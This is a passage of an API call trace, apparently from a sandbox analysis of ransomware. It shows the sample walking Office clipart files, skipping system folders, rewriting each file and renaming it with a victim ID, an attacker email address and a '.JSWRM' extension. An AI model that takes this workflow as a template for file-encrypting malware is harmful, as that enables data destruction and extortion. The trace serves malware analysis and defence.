cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0084.868] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0084.868] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152878.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152878.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0084.869] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=14888) returned 1 [0084.869] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0084.869] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3a20) returned 0x24d210 [0084.870] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3a20, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3a20, lpOverlapped=0x0) returned 1 [0084.875] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0084.875] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3a20, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3a20, lpOverlapped=0x0) returned 1 [0084.876] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0084.876] CloseHandle (hObject=0x314) returned 1 [0084.876] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0084.876] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0084.876] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0084.876] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0084.876] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0084.876] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0084.876] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0084.876] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0084.876] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0084.876] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0084.876] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0084.876] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0084.876] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0084.876] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0084.876] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152878.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152878.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152878.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152878.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0084.877] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0084.877] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0084.877] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0084.877] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea574b2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xea574b2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xea574b2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2370, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0152882.WMF", cAlternateFileName="")) returned 1 [0084.877] lstrcmpiW (lpString1="J0152882.WMF", lpString2=".") returned 1 [0084.877] lstrcmpiW (lpString1="J0152882.WMF", lpString2="..") returned 1 [0084.877] lstrcmpiW (lpString1="J0152882.WMF", lpString2="...") returned 1 [0084.877] lstrcmpiW (lpString1="J0152882.WMF", lpString2="windows") returned -1 [0084.877] lstrcmpiW (lpString1="J0152882.WMF", lpString2="recovery") returned -1 [0084.877] lstrcmpiW (lpString1="J0152882.WMF", lpString2="perflogs") returned -1 [0084.877] lstrcmpiW (lpString1="J0152882.WMF", lpString2="documents and settings") returned 1 [0084.877] lstrcmpiW (lpString1="J0152882.WMF", lpString2="$RECYCLE.BIN") returned 1 [0084.877] lstrcmpiW (lpString1="J0152882.WMF", lpString2="system volume information") returned -1 [0084.877] lstrcmpiW (lpString1="J0152882.WMF", lpString2="msocache") returned -1 [0084.877] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0084.877] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152882.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0084.877] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152882.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0152882.WMF", lpUsedDefaultChar=0x0) returned 12 [0084.877] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0084.877] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0084.877] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152882.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0084.877] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152882.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0152882.WMF", lpUsedDefaultChar=0x0) returned 12 [0084.877] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0084.877] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0084.877] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0084.877] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0084.877] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0084.877] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0084.878] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152882.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152882.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0084.878] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9072) returned 1 [0084.878] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0084.878] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2370) returned 0x24d210 [0084.878] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2370, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2370, lpOverlapped=0x0) returned 1 [0085.033] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.033] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2370, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2370, lpOverlapped=0x0) returned 1 [0085.033] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0085.033] CloseHandle (hObject=0x314) returned 1 [0085.033] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0085.033] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0085.033] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0085.033] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0085.033] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0085.033] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0085.033] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0085.033] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0085.033] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0085.034] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0085.034] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0085.034] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0085.034] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0085.034] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0085.034] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152882.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152882.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152882.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152882.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0085.035] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0085.035] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0085.035] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0085.035] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea574b2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xea574b2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xea574b2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1b2c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0152884.WMF", cAlternateFileName="")) returned 1 [0085.035] lstrcmpiW (lpString1="J0152884.WMF", lpString2=".") returned 1 [0085.035] lstrcmpiW (lpString1="J0152884.WMF", lpString2="..") returned 1 [0085.035] lstrcmpiW (lpString1="J0152884.WMF", lpString2="...") returned 1 [0085.035] lstrcmpiW (lpString1="J0152884.WMF", lpString2="windows") returned -1 [0085.035] lstrcmpiW (lpString1="J0152884.WMF", lpString2="recovery") returned -1 [0085.035] lstrcmpiW (lpString1="J0152884.WMF", lpString2="perflogs") returned -1 [0085.035] lstrcmpiW (lpString1="J0152884.WMF", lpString2="documents and settings") returned 1 [0085.035] lstrcmpiW (lpString1="J0152884.WMF", lpString2="$RECYCLE.BIN") returned 1 [0085.035] lstrcmpiW (lpString1="J0152884.WMF", lpString2="system volume information") returned -1 [0085.035] lstrcmpiW (lpString1="J0152884.WMF", lpString2="msocache") returned -1 [0085.035] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0085.035] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152884.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.035] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152884.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0152884.WMF", lpUsedDefaultChar=0x0) returned 12 [0085.035] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0085.035] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0085.035] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152884.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.035] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152884.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0152884.WMF", lpUsedDefaultChar=0x0) returned 12 [0085.035] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0085.035] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0085.035] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0085.035] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0085.036] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0085.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0085.036] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152884.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152884.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0085.037] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6956) returned 1 [0085.037] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.037] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1b20) returned 0x205850 [0085.037] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1b20, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1b20, lpOverlapped=0x0) returned 1 [0085.080] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.080] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1b20, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1b20, lpOverlapped=0x0) returned 1 [0085.080] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0085.080] CloseHandle (hObject=0x314) returned 1 [0085.080] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0085.080] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0085.080] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0085.080] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0085.080] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0085.080] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0085.080] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0085.080] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0085.080] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0085.080] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0085.080] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0085.081] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0085.081] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0085.081] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0085.081] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152884.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152884.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152884.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152884.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0085.082] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0085.082] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0085.082] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0085.082] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea574b2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xea574b2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xea574b2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x794, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0152890.WMF", cAlternateFileName="")) returned 1 [0085.082] lstrcmpiW (lpString1="J0152890.WMF", lpString2=".") returned 1 [0085.082] lstrcmpiW (lpString1="J0152890.WMF", lpString2="..") returned 1 [0085.082] lstrcmpiW (lpString1="J0152890.WMF", lpString2="...") returned 1 [0085.082] lstrcmpiW (lpString1="J0152890.WMF", lpString2="windows") returned -1 [0085.082] lstrcmpiW (lpString1="J0152890.WMF", lpString2="recovery") returned -1 [0085.082] lstrcmpiW (lpString1="J0152890.WMF", lpString2="perflogs") returned -1 [0085.082] lstrcmpiW (lpString1="J0152890.WMF", lpString2="documents and settings") returned 1 [0085.082] lstrcmpiW (lpString1="J0152890.WMF", lpString2="$RECYCLE.BIN") returned 1 [0085.082] lstrcmpiW (lpString1="J0152890.WMF", lpString2="system volume information") returned -1 [0085.082] lstrcmpiW (lpString1="J0152890.WMF", lpString2="msocache") returned -1 [0085.082] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0085.082] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152890.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.082] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152890.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0152890.WMF", lpUsedDefaultChar=0x0) returned 12 [0085.082] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0085.082] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0085.082] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152890.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.082] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152890.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0152890.WMF", lpUsedDefaultChar=0x0) returned 12 [0085.082] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0085.082] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0085.082] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0085.082] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0085.082] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0085.082] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0085.082] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152890.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152890.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0085.083] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1940) returned 1 [0085.083] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.083] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x790) returned 0x20c6c0 [0085.083] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x790, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x790, lpOverlapped=0x0) returned 1 [0085.348] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.348] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x790, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x790, lpOverlapped=0x0) returned 1 [0085.348] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0085.348] CloseHandle (hObject=0x314) returned 1 [0085.348] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0085.348] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0085.348] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0085.348] MultiByteToWideChar (in: 